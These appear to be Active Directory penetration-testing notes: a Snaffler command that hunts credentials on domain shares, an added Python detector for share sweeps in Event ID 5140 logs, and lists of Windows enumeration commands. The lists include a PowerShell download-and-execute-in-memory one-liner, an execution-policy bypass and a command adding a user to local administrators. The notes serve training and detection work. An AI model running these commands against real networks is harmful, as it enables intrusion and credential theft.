Snaffler helps us acquire credentials or other sensitive data in an Active Directory environment. It works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
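The behaviour described above, one account reaching shares on many hosts in a short time, shows up for defenders in Windows Security Event ID 5140 ("A network share object was accessed"), which is logged when file share auditing is enabled. The following is an added example, not part of the original notes or of Snaffler, that flags that pattern in a CSV export of those events. The host names, accounts, CSV layout and thresholds are constructed assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Event ID 5140 records exported to CSV (layout is an assumption).
SAMPLE_5140 = r"""
TimeCreated,Computer,SubjectUserName,IpAddress,ShareName
2024-05-01T08:55:00,FS01,jsmith,10.0.0.50,\\*\Finance
2024-05-01T09:00:05,FS01,svc_scan,10.0.0.77,\\*\IPC$
2024-05-01T09:00:06,FS01,svc_scan,10.0.0.77,\\*\Finance
2024-05-01T09:00:40,FS02,svc_scan,10.0.0.77,\\*\IPC$
2024-05-01T09:00:41,FS02,svc_scan,10.0.0.77,\\*\HR
2024-05-01T09:01:10,WS10,svc_scan,10.0.0.77,\\*\C$
2024-05-01T09:01:30,DC01,svc_scan,10.0.0.77,\\*\SYSVOL
2024-05-01T13:20:00,FS01,jsmith,10.0.0.50,\\*\Finance
2024-05-01T13:21:00,FS02,jsmith,10.0.0.50,\\*\HR
"""


def load_events(text):
    """Parse the CSV export into (time, host, share) tuples keyed by (account, source IP)."""
    by_source = defaultdict(list)
    for row in csv.DictReader(io.StringIO(text.strip())):
        key = (row["SubjectUserName"], row["IpAddress"])
        by_source[key].append(
            (datetime.fromisoformat(row["TimeCreated"]), row["Computer"], row["ShareName"]))
    return by_source


def find_share_sweeps(by_source, window=timedelta(minutes=10), min_hosts=3):
    """Flag sources that reach shares on >= min_hosts distinct hosts within one window."""
    alerts = []
    for (account, ip), events in by_source.items():
        events = sorted(events)
        best, start = None, 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            hosts = {host for _, host, _ in events[start:end + 1]}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best["hosts"])):
                shares = {(host, share) for _, host, share in events[start:end + 1]}
                best = {"account": account, "source": ip,
                        "hosts": sorted(hosts), "shares": len(shares)}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_share_sweeps(load_events(SAMPLE_5140)):
        print(alert)
```

The window and host threshold need tuning against normal behaviour in the environment, since backup and management accounts legitimately touch many hosts.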
Credentialed Enumeration With Built-In Tools
Basic Enumeration Commands
# Prints the PC's name
hostname
# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version
# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
PowerShell Enumeration Commands
# Lists available modules loaded for use.
Get-Module
# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List
# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process
# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value
# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Firewall status
netsh advfirewall show allprofiles
# Windows Defender status
Get-MpComputerStatus
Net Commands
# Information about password requirements
net accounts
# Password and lockout policy
net accounts /domain
# Information about domain groups
net group /domain
# List users with domain admin privileges
net group "Domain Admins" /domain
# List of PCs connected to the domain
net group "domain computers" /domain
# List PC accounts of domain controllers
net group "Domain Controllers" /domain
# Users that belong to the group
net group <domain_group_name> /domain
# List of domain groups
net groups /domain
# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup administrators /domain
# Add user to administrators
net localgroup administrators [username] /add
# Check current shares
net share
# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain
# List all users of the domain
net user /domain
# Get a list of computers
net view